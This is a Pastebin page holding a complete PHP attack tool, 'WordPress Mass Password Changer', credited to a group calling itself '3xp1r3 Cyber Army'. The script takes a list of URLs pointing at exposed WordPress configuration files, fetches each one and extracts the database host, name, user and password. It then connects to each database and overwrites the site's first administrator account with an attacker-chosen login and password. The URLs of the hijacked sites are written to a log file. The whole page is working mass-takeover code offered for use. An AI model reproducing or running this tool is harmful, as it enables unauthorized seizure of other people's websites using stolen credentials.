Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /**
- * @author: FaisaL Ahmed aka rEd X
- * @mail: me@faialahmed.me
- * @Last Updated: 14 June 2015
- */
- set_time_limit(0);
- ini_set('display_errors', 0);
- echo '<html><head>
- <title>WordPress Mass Password Changer | 3xp1r3 Cyber Army</title>
- <meta content="text/html; charset=utf-8">
- <meta name="keywords" content="WordPress Password Changer, 3xp1r3, 3xp1r3 Cyber Army, rEd X" />
- <meta name="description" content="WordPress Mass Password Changer" />
- <meta name="author" content="rEd X" />
- <link rel="SHORTCUT ICON" href="http://us.yimg.com/i/mesg/emoticons7/61.gif">
- <link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
- <link rel="stylesheet" type="text/css" href="http://faisalahmed.me/wp-content/assets/css/1.css">
- </head><body>';
- echo '<div style="font-family: Iceland;font-size: 35pt;text-shadow: 0 0 6px #FF0000, 0 0 5px #FF0000, 0 0 5px #FF0000;color: #FFF">WordPress Mass Password Changer<br /><sub>3xp1r3 Cyber Army</sub></div><br/>';
- echo '<form method="POST" action="" ><center><table border="1"><tr><td>Config List:</td>
- <td><textarea name="url" cols="50" rows="10" ></textarea></td></tr>
- <tr><td>User/Password</td><td><input type="text" name="username" size="25" value="3ca"> / <input type="text" name="password" size="25" value="3xp1r3"></td></tr></table>
- <br><input type="Submit" class="button" value="Submit"><input type="hidden" name="action" value="1"></form></center>';
- if ($_POST['action']=='1'){
- if ($_POST['url']==''){
- echo "<div class='result'>No CONFIG FOUND<br>Make sure you provided a config list!</div><br>";
- }else{
- $url=$_POST['url'];
- $users = explode("\n",$url);
- foreach ($users as $user) {
- $user1=trim($user);
- $code=file_get_contents2($user1);
- preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b1);
- $db=$b1[1][0];
- preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b2);
- $user=$b2[1][0];
- preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b3);
- $db_password=$b3[1][0];
- preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b4);
- $host=$b4[1][0];
- preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$code,$b5);
- $p=$b5[1][0];
- $d=@mysql_connect( $host, $user, $db_password ) ;
- if ($d){
- @mysql_select_db($db );
- $usern=$_POST['username'];
- $passwd=$_POST['password'];
- $sql = "UPDATE `".$p."users` SET `user_pass` = MD5( '".$passwd."' ) WHERE `ID` = '1';";
- @mysql_query($sql) ; ;
- $sql = "UPDATE `".$p."users` SET `user_login` = '".$usern."' WHERE `ID` = '1';";
- @mysql_query($sql) ; ;
- $aa=@mysql_query("select option_value from `".$p."options` WHERE `option_name` = 'siteurl';") ;;
- $siteurl=@mysql_fetch_array($aa) ;
- $siteurl=$siteurl['option_value'];
- $tr.="$siteurl\n";
- mysql_close();
- }
- }
- if ($tr)
- $filename = 'pchangedlist.txt';
- $fp = fopen($filename, "a+");
- $write = fputs($fp, $tr);
- fclose($fp);
- echo "<div class='result'>Password Changing Completed ! :)<br><br>";
- echo "<a href='pchangedlist.txt' target='_blank'>View List of Password Changed Sites</a></div><br/>";
- //echo "Index changed for <br><br><textarea cols='50' rows='10' >$tr</textarea>";
- }
- }
- function file_get_contents2($u){
- $ch = curl_init();
- curl_setopt($ch,CURLOPT_URL,$u);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
- curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 ");
- $result = curl_exec($ch);
- return $result ;
- }
- echo "<br><br>© rEd X | 3xp1r3 Cyber Army";
- ?>
- </html>
Add Comment
Please, Sign In to add comment